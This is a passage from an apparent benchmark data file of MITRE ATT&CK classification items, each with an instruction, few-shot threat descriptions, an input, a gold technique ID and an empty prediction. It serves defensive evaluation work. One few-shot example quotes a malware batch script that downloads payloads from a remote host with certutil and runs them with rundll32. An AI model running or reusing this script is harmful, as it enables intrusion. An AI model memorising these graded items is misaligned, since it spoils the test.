"You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LockerGoga has been observed changing account passwords and logging off current users.\n\t - T1531: Account Access Removal\n- Text: One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. With a successful connection, it will send the word \"almond\" The server should reply either with \"who\" or \"ice. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are\n\t - T1033: System Owner/User Discovery\n- Text: Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma. The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. TLP: WHITE https://www.us-cert.gov/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. It starts from the tenth byte in the data section of the initial TCP POST request. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6).File Metadata and StringsThe binary is a PEx86 binary, which can be run on both x86 and 64-bit Windows OS. We determined that the binary was packed because we did not see the C2 URL or any signs of being an information stealer (such as an applications list) in the binary strings and resources\n\t - T1555: Credentials from Password Stores\n", + "input": "MegaCortex has changed user account passwords and logged users off the system.", + "gold": "- T1531: Account Access Removal", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n", + "input": "StrifeWater can execute shell commands using `cmd.exe`.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the /reset flag to reset the executable\u2019s permissions, then using takeown.exe with the /F flag to take ownership of the executable\n\t - T1007: System Service Discovery\n- Text: Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices.\n\t - T1057: Process Discovery\n- Text: The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration\n\t - T1049: System Network Connections Discovery\n", + "input": "Epic uses the \"tasklist /svc\" command to list the services on the system.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kazuar can overwrite files with random data before deleting them.\n\t - T1485: Data Destruction\n- Text: Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: Contains two DLL function exports: start and ss2 - Not dropped to the disk - Responsible for terminating processes and stopping/disabling services related to endpoint security - Responsible for file encryption - Responsible for creating multiple worker threads for encryption - Responsible for creating the ransom notes - No longer uses the process rundll32.exe as a loader, but instead uses the MegaCortex binary as the DLL loader - Responsible for deleting volume shadow copies using vssadmin.exe and wiping deleted data from all drives using cipher.exe\n\t - T1561.001: Disk Wipe - Disk Content Wipe\n", + "input": "WhisperGate can corrupt files by overwriting the first 1 MB with `0xcc` and appending random extensions.", + "gold": "- T1485: Data Destruction", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.\n\t - T1204.002: User Execution - Malicious File\n- Text: Bumblebee has been spread through e-mail campaigns with malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Higaisa has sent spearphishing emails containing malicious attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1007: System Service Discovery\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: KEYMARBLE has a command to create Registry entries for storing data under \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath\".\n\t - T1112: Modify Registry\n- Text: For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014 the Linux kernel firewall \u2014 using the iptc_insert_entry() function from libiptc1 to allow output communication to it\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n", + "input": "Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the \"taskkill\" command.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QakBot can use \"net config workstation\", \"arp -a\", and \"ipconfig /all\" to gather network configuration information.\n\t - T1016: System Network Configuration Discovery\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n- Text: GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n", + "input": "KeyBoy can determine the public or WAN IP address for the system.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mis-Type has temporarily stored collected information to the files `\u201c%AppData%\\{Unique Identifier}\\HOSTRURKLSR\u201d` and `\u201c%AppData%\\{Unique Identifier}\\NEWERSSEMP\u201d`.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: APT28 has staged archives of collected data on a target's Outlook Web Access (OWA) server.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "menuPass stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them\n\t - T1132.001: Data Encoding - Standard Encoding\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "RTM encrypts C2 traffic with a custom RC4 variant.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NOBELIUM has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications, creation of additional service principal credentials, and more. In one incident, MSTIC observed the use of Azure RunCommand, paired with Azure admin-on-behalf-of (AOBO), as a technique to gain access to virtual machines and shift access from cloud to on-premise. NOBELIUM has demonstrated an ongoing interest in targeting privileged users, including Global Administrators. NOBELIUM is frequently observed conducting activities consistent with intelligence collection\n\t - T1087.004: Account Discovery - Cloud Account\n- Text: AADInternals can enumerate Azure AD groups.\n\t - T1069.003: Permission Groups Discovery - Cloud Groups\n- Text: AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.\n\t - T1526: Cloud Service Discovery\n", + "input": "ROADTools can enumerate Azure AD users.", + "gold": "- T1087.004: Account Discovery - Cloud Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the specified directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n\t - T1012: Query Registry\n\t - T1083: File and Directory Discovery\n- Text: However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool \u201cBBSRAT. Targeting and Infrastructure . As described in earlier reports on \u201cRoaming Tiger\u201d, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the \u201cRoaming Tiger\u201d campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot\u2019s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\[3 characters]\\[1 character]. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry Run and execute ordinal #1 of the DLL\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "LitePower can query the Registry for keys added to execute COM hijacking.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb \u2190 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb \u2190 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb \u2190 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as \u201camdocl_as32.exe\u201d alongside the three dll\u2019s listed above\n\t - T1055: Process Injection\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: In this particular instance, the following script is retrieved:@echo off :if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del /f /q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del /f /q setup2.txt > nul :GOTO ISEXIST :ISEXIST if exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT) :EXECUTE ver | findstr /i \"10\\.\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS) :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT :OTHEROS wusa %TEMP%\\setup.cab /quiet /extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT :EXIT del /f /q setup.cab > nul del /f /q %~dpnx0 > nulThis script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable\n\t - T1071: Application Layer Protocol\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Meteor can use PowerShell commands to disable the network adapters on a victim machines.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Lazarus Group has replaced `win_fw.dll`, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.", + "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HAFNIUM has used the Exchange Power Shell module \"Set-OabVirtualDirectoryPowerShell\" to export mailbox data.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The payload is downloaded from the following location and saved to \"%PUBLIC%\\svchost32.exe\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.\n\t - T1609: Container Administration Command\n", + "input": "TeamTNT has executed PowerShell commands in batch scripts.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Encoding the encryption key In order for the C&C server to decrypt the encrypted data, the randomly generated AES256 key must be included in the packet along with the encrypted data\n\t - T1573: Encrypted Channel\n\t - T1486: Data Encrypted for Impact\n- Text: PlugX can use RC4 encryption in C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: has used RAR to compress collected data before.\n\t - T1560: Archive Collected Data\n", + "input": "ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: After the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name\n\t - T1036: Masquerading\n", + "input": "Small Sieve can use variations of Microsoft and Outlook spellings, such as \"Microsift\", in its file names to avoid detection.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using a specifically crafted TCP packets sent to the routers interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the routers IOS that provide functionality similar to the backdoor password\n\t - T1205: Traffic Signaling\n- Text: HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.\n\t - T1205.002: Traffic Signaling - Socket Filters\n", + "input": "Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.", + "gold": "- T1205: Traffic Signaling", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has used VBS scripts throughout its operations.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Leviathan has created new email accounts for targeting efforts.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: OSInfo has enumerated the local administrators group.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", + "input": "During Operation Wocao, threat actors used VBScript to conduct reconnaissance on targeted systems.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Seasalt has a command to download additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: The SUPERNOVA webshell is an anonymous code C# webshell written in .NET C# that is specifically written for usage on SolarWinds Orion servers\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "JHUHUGIT can retrieve an additional payload from its C2 server. JHUHUGIT has a command to download files to the victim\u2019s machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ran a command to compile an archive of file types of interest from the victim user's directories.\n\t - T1005: Data from Local System\n\t - T1119: Automated Collection\n- Text: RTM can download additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment.\n\t - T1570: Lateral Tool Transfer\n", + "input": "DanBot can upload files from compromised hosts.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects network adapter and interface information by using the commands ipconfig /all, arp -a and route print. It also collects the system's MAC address with 